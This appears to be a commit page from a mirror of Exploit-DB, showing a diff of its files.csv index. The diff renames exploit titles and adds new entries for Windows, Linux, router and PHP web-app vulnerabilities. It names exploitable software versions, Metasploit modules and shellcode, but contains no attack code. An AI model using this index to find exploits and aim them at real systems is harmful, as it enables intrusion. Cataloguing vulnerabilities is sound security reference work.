bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-22

Browse source 
13 new exploits

Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)
Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)

Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference
Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference
Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)
Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)
NTP 4.2.8p8 - Denial of Service

Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow
Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow

Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)
Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)

Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)
Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)

Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit)
Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit)

Borland Interbase - SVC_attach() Buffer Overflow (Metasploit)
Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit)

Borland Interbase - Create-Request Buffer Overflow (Metasploit)
Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit)
Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)
Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)
Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)
Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)
Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)
Borland Interbase - INET_connect() Buffer Overflow (Metasploit)
Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit)
Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit)

Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)

phpunity.postcard - (gallery_path) Remote File Inclusion
phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion

CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion
CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion

1024 CMS 0.7 - (download.php item) Remote File Disclosure
1024 CMS 0.7 - 'download.php' Remote File Disclosure

cpCommerce 1.1.0 - (category.php id_category) SQL Injection
CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection

1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
1024 CMS 1.3.1 - Local File Inclusion / SQL Injection
Mole 2.1.0 - (viewsource.php) Remote File Disclosure
ChartDirector 4.1 - (viewsource.php) File Disclosure
724CMS 4.01 Enterprise - (index.php ID) SQL Injection
My Gaming Ladder 7.5 - (ladderid) SQL Injection
Mole 2.1.0 - 'viewsource.php' Remote File Disclosure
ChartDirector 4.1 - 'viewsource.php' File Disclosure
724CMS 4.01 Enterprise - 'index.php' SQL Injection
My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection
exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities
Pligg CMS 9.9.0 - (editlink.php id) SQL Injection
ExBB 0.22 - Local / Remote File Inclusion
Pligg CMS 9.9.0 - 'editlink.php' SQL Injection

Prediction Football 1.x - (matchid) SQL Injection
Prediction Football 1.x - 'matchid' Parameter SQL Injection

Free Photo Gallery Site Script - (path) File Disclosure
Free Photo Gallery Site Script - 'path' Parameter File Disclosure
LiveCart 1.1.1 - (category id) Blind SQL Injection
Ksemail - 'index.php language' Local File Inclusion
LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection
Ksemail - Local File Inclusion
RX Maxsoft - 'popup_img.php fotoID' SQL Injection
PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
RX Maxsoft - 'fotoID' Parameter SQL Injection
PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection
Pollbooth 2.0 - (pollID) SQL Injection
cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Pollbooth 2.0 - 'pollID' Parameter SQL Injection
CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion

SmallBiz eShop - (content_id) SQL Injection
SmallBiz eShop - 'content_id' Parameter SQL Injection

lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities
LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities

PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection
PostcardMentor - 'cat_fldAuto' Parameter SQL Injection

Pligg CMS 9.9.0 - (story.php id) SQL Injection
Pligg CMS 9.9.0 - 'story.php' SQL Injection

LokiCMS 0.3.4 - writeconfig() Remote Command Execution
LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution

cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass
CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass

cpCommerce 1.2.8 - (id_document) Blind SQL Injection
CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection

cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion
CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion

ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure
ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure

Pligg CMS 1.0.4 - (story.php?id) SQL Injection
Pligg CMS 1.0.4 - 'story.php' SQL Injection

724CMS 4.59 Enterprise - SQL Injection
724CMS Enterprise 4.59 - SQL Injection

lightneasy 3.2.2 - Multiple Vulnerabilities
LightNEasy 3.2.2 - Multiple Vulnerabilities

My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure
My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure

Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection
Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection

PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection
PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection

CPCommerce 1.1 - Manufacturer.php SQL Injection
CPCommerce 1.1 - 'manufacturer.php' SQL Injection
LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting
LiveCart 1.0.1 - category q Parameter Cross-Site Scripting
LiveCart 1.0.1 - order return Parameter Cross-Site Scripting
LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting

Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting
Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting

Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection
Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection

CMS Made Simple 2.1.5 - Cross-Site Scripting
Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal
WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery
Mezzanine 4.2.0 - Cross-Site Scripting
LEPTON 2.2.2 - SQL Injection
LEPTON 2.2.2 - Remote Code Execution
FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery
FUDforum 3.0.6 - Local File Inclusion
Wordpress Plugin Olimometer 2.56 - SQL Injection
This commit is contained in:
Offensive Security 2016-11-22 05:01:18 +00:00
parent 4c5719d98f
commit dab1517032
16 changed files with 1406 additions and 90 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

126
files.csv
View file

@ -720,7 +720,7 @@ id,file,description,date,author,platform,type,port
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0
5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0
5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0
5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0
5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0
5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0
@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0
40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0
@ -5271,6 +5271,10 @@ id,file,description,date,author,platform,type,port
40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0
40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0
40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0
40793,platforms/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos,0
40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0
40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0
40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9585,7 +9589,7 @@ id,file,description,date,author,platform,type,port
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0
5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0
5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954
@ -9996,7 +10000,7 @@ id,file,description,date,author,platform,type,port
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
@ -10010,9 +10014,9 @@ id,file,description,date,author,platform,type,port
10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80
10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0
10011,platforms/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050
10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525
10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0
10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143
@ -10511,7 +10515,7 @@ id,file,description,date,author,platform,type,port
16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0
16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16437,platforms/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0
16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
@ -10521,13 +10525,13 @@ id,file,description,date,author,platform,type,port
16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,windows,remote,0
16447,platforms/windows/remote/16447.rb,"Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16447,platforms/windows/remote/16447.rb,"Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16449,platforms/windows/remote/16449.rb,"Borland Interbase - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16449,platforms/windows/remote/16449.rb,"Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0
16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16453,platforms/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0
16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
@ -10836,12 +10840,12 @@ id,file,description,date,author,platform,type,port
16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0
16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0
16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16839,platforms/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16840,platforms/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16843,platforms/linux/remote/16843.rb,"Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16844,platforms/linux/remote/16844.rb,"Borland Interbase - INET_connect() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16843,platforms/linux/remote/16843.rb,"Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16844,platforms/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0
16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0
16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
@ -15081,6 +15085,7 @@ id,file,description,date,author,platform,type,port
40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16485,7 +16490,7 @@ id,file,description,date,author,platform,type,port
2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0
2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0
2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0
2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0
2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0
2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0
2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0
@ -17254,7 +17259,7 @@ id,file,description,date,author,platform,type,port
3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0
3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0
3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0
3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0
3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0
3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0
3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0
@ -17475,7 +17480,7 @@ id,file,description,date,author,platform,type,port
3827,platforms/php/webapps/3827.txt,"Sendcard 3.4.1 - (sendcard.php form) Local File Inclusion",2007-05-01,ettee,php,webapps,0
3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - (wppath) Remote File Inclusion",2007-05-01,Crackers_Child,php,webapps,0
3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0
3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0
3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0
3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,php,webapps,0
3834,platforms/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,php,webapps,0
3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0
@ -17566,7 +17571,7 @@ id,file,description,date,author,platform,type,port
3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0
3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0
3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection",2007-05-24,Silentz,php,webapps,0
3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection",2007-05-24,Kacper,php,webapps,0
3981,platforms/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection",2007-05-24,Kacper,php,webapps,0
3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0
3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0
3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0
@ -18044,7 +18049,7 @@ id,file,description,date,author,platform,type,port
